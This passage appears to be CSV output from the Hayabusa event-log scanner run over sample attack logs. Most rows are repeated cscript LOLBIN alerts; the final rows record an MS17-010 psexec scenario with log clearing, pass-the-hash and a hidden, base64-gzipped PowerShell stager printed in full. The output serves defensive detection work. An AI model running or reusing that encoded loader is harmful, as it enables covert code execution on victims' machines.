0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:07:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x958 | User: SRVDEFENDER01$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:08:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:08:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:09:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x164 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:09:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x164 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:10:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xd54 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:10:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xd54 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:11:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1268 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload 
via process execution.evtx +2021-04-22 00:11:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1268 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:12:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1380 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:12:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1380 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:13:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf24 | User: SRVDEFENDER01$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:13:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf24 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:14:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xff8 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:14:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xff8 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:15:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x17f0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:15:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x17f0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:16:03.002 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:16:03.002 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with 
service over SMB (GLOBAL).evtx" +2021-04-22 00:17:03.011 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:17:03.011 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:18:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xea4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:18:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xea4 | User: SRVDEFENDER01$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:19:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:19:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 17:50:53.614 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x74872,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec 
(GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: 0Konuy9q8HtkWeKS | IP Addr: 10.23.123.11 | LID: 0x74872,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x74872,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: FS03VULN$ | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: FS03VULN$ | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 
17:51:04.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: FS03VULN$ | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.851 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPg2gWACA7VWbW+bSBD+nEj5D6iyBKiOIbbbvEiVbgFju4kdbBI7sWud1rCGbRbWgSWO0/a/32CgTa/pXXvSIb/sy8zszDPPzrDKYk9QHku+w91M+nSwv+fgBEeSUouy9fqkLtXSsaPu7cFGjXd7+K30TlLmaL22eIRpvDg7M7MkIbEo5o0uEShNSbRklKSKKn2WpiFJyOHl8iPxhPRJqv3Z6DK+xKwU25rYC4l0iGI/37vgHs4darhrRoUif/ggq/PDo0Wjc59hliqyu00FiRo+Y7IqfVHzA6+2a6LIA+olPOUr0ZjSuNVsXMcpXpEhWHsgAyJC7qeyCmHAJyEiS2KpCCi3UOwrMgydhHvI9xOSpnJdmue254vFH8q8PHicxYJGpNGPBUn42iXJA/VI2ujh2GdkTFYL0HJFQuNgoaog9sDviFKLM8bq0u+YUYZkU8H2q0rKcyWQckSi1iGXLwU64H7GSKEqv+BpQQAVnpIEAN6Xg/2D/VXFGc82njMGRnvz3ZiAe4rDU7oTeyfpdWkA52DBky1Ma1dJRtTFV3AhEcGbSf3n+keVMIgKi03PYW0+4dRfgE6Z01rQub/M13/OTYusaEysbYwj6lX0U17CmawY2cXYqMSG4JUilxvEtwgjARY5cHm6f1DrRFR81TUyynySIA9ylYJXkEb1e2eKXChyPx6QCEAq5sC/2gpITyrpkujb6vR8DkKyyXCa1iUng1vn1SWXYEb8uoTilJZbKBN8N5S/uTvImKAeTkVlbqFWOJbnmTxORZJ5kDeI/cpdE49ilkNRl3rUJ8bWpUF1rvwiECZmDK4CWHqARMBKDoArcjYk4OIu82rDJaIfrRmJQGZ3/W2GA7jsJeF39MEB8eW/e1jxuSBvjkUFwjP/IMEu46IuTWgioIrkuO5o9N/Of1ZAdp6YCSlzoVRXZG5sRc7s2qOXU7KEZQdCIgAAO+GRgVPytl1UCuWVdkkdBM+t1XNnfeEO4GvB1+7HbLA6cYTOI9rq8
4Fnpk7XPkF0E2y8kyHy/Pc+OXUnbeF2+sJ0UG9EdaMdeoZ+tRsHt/QoCJA/HIUe051OdDHsp4/apjfNbRU2vHa7d6OjVqt92dLvALhc5w50Irp5vIAxlMTLC6OfGnqfdd6b4+W0ac+mrKe17XA15an79tbSNO3Ux9Zgi5DB/dZge3M05lc9LzLaMddOzfYd6iBkxp2JbfDzWyNBjjbBwZqboX9sNgMTGbZHyWx0bRujkW2g6+7He+tUC7TT6Q0OjemkSWfrm3EIc3vTG51rervvkyc+2wBwXY5wMAaZwGx64QpkrNfIeD3kaRPfGRwZIGPP7lE3vF3bDoP9q+smRxM2vMHoYra1Ne3o1mmjns6n3QCNQBwHxgij9MF6srSjic/96Zvh7Uqb3LBjzTJHTniTx6yto/x307POvdnRxrs8bhv6vRnRiC2bvnZ6fWLEm/PAeQj80fR4/DjcLuHca02bvMrZBHSqLWfm0npGlJ/V+QFO0hAzIBDU7+rW2jyxy4rscJprKErRze9IEhMGrRCaZcV9xBj38p6QF29oR0WTyHvWNQxbzRdHqvRVUP3WKaqls7MZeAl36dFrXJA4EGFdf2zpOlR9/bGtQ5C/HpfJ11sFDNXznlHgUhhmO8Nqfrlq7Ol/xqq80SH8+f+C1be1f9j9Jfz0ehnvD+vfL/wWnr8f+xRTAaIuVCVGirb4IgQlM569OLAnyPuqfPI3v8tMHA7hbeJg/y89wtRZZwoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.851 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 
System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7f0 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:05.633 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 
System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAPg2gWACA7VWbW+bSBD+nEj5D6iyBKiOIbbbvEiVbgFju4kdbBI7sWud1rCGbRbWgSWO0/a/32CgTa/pXXvSIb/sy8zszDPPzrDKYk9QHku+w91M+nSwv+fgBEeSUouy9fqkLtXSsaPu7cFGjXd7+K30TlLmaL22eIRpvDg7M7MkIbEo5o0uEShNSbRklKSKKn2WpiFJyOHl8iPxhPRJqv3Z6DK+xKwU25rYC4l0iGI/37vgHs4darhrRoUif/ggq/PDo0Wjc59hliqyu00FiRo+Y7IqfVHzA6+2a6LIA+olPOUr0ZjSuNVsXMcpXpEhWHsgAyJC7qeyCmHAJyEiS2KpCCi3UOwrMgydhHvI9xOSpnJdmue254vFH8q8PHicxYJGpNGPBUn42iXJA/VI2ujh2GdkTFYL0HJFQuNgoaog9sDviFKLM8bq0u+YUYZkU8H2q0rKcyWQckSi1iGXLwU64H7GSKEqv+BpQQAVnpIEAN6Xg/2D/VXFGc82njMGRnvz3ZiAe4rDU7oTeyfpdWkA52DBky1Ma1dJRtTFV3AhEcGbSf3n+keVMIgKi03PYW0+4dRfgE6Z01rQub/M13/OTYusaEysbYwj6lX0U17CmawY2cXYqMSG4JUilxvEtwgjARY5cHm6f1DrRFR81TUyynySIA9ylYJXkEb1e2eKXChyPx6QCEAq5sC/2gpITyrpkujb6vR8DkKyyXCa1iUng1vn1SWXYEb8uoTilJZbKBN8N5S/uTvImKAeTkVlbqFWOJbnmTxORZJ5kDeI/cpdE49ilkNRl3rUJ8bWpUF1rvwiECZmDK4CWHqARMBKDoArcjYk4OIu82rDJaIfrRmJQGZ3/W2GA7jsJeF39MEB8eW/e1jxuSBvjkUFwjP/IMEu46IuTWgioIrkuO5o9N/Of1ZAdp6YCSlzoVRXZG5sRc7s2qOXU7KEZQdCIgAAO+GRgVPytl1UCuWVdkkdBM+t1XNnfeEO4GvB1+7HbLA6cYTOI9rq84Fnpk7XPkF0E2y8kyHy/Pc+OXUnbeF2+sJ0UG9EdaMdeoZ+tRsHt/QoCJA/HIUe051OdDHsp4/apjfNbRU2vHa7d6OjVqt92dLvALhc5w50Irp5vIAxlMTLC6OfGnqfdd6b4+W0ac+mrKe17XA15an79tbSNO3Ux9Zgi5DB/dZge3M05lc9LzLaMddOzfYd6iBkxp2JbfDzWyNBjjbBwZqboX9sNgMTGbZHyWx0bRujkW2g6+7He+tUC7TT6Q0OjemkSWfrm3EIc3vTG51rervvkyc+2wBwXY5wMAaZwGx64QpkrNfIeD3kaRPfGRwZIGPP7lE3vF3bDoP9q+smRxM2vMHoYra1Ne3o1mmjns6n3QCNQBwHxgij9MF6srSjic/96Zvh7Uqb3LBjzTJHTniTx6yto/x307POvdnRxrs8bhv6vRnRiC2bvnZ6fWLEm/PAeQj80fR4/DjcLuHca02bvMrZBHSqLWfm0npGlJ/V+QFO0hAzIBDU7+rW2jyxy4rscJprKErRze9IEhMGrRCaZcV9xBj38p6QF29oR0WTyHvWNQxbzRdHqvRVUP3WKaqls7MZeAl36dFrXJA4EGFdf2zpOlR9/bGtQ5C/HpfJ11sFDNXznlHgUhhmO8Nqfrlq7Ol/xqq80SH8+f+C1be1f9j9Jfz0ehnvD+vfL/wWnr8f+xRTAaIuVCVGirb4IgQlM569OLAnyPuqfPI3v8tMHA7hbeJg/y89wtRZZwoAAA=='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f0 | User: FS03VULN$ 
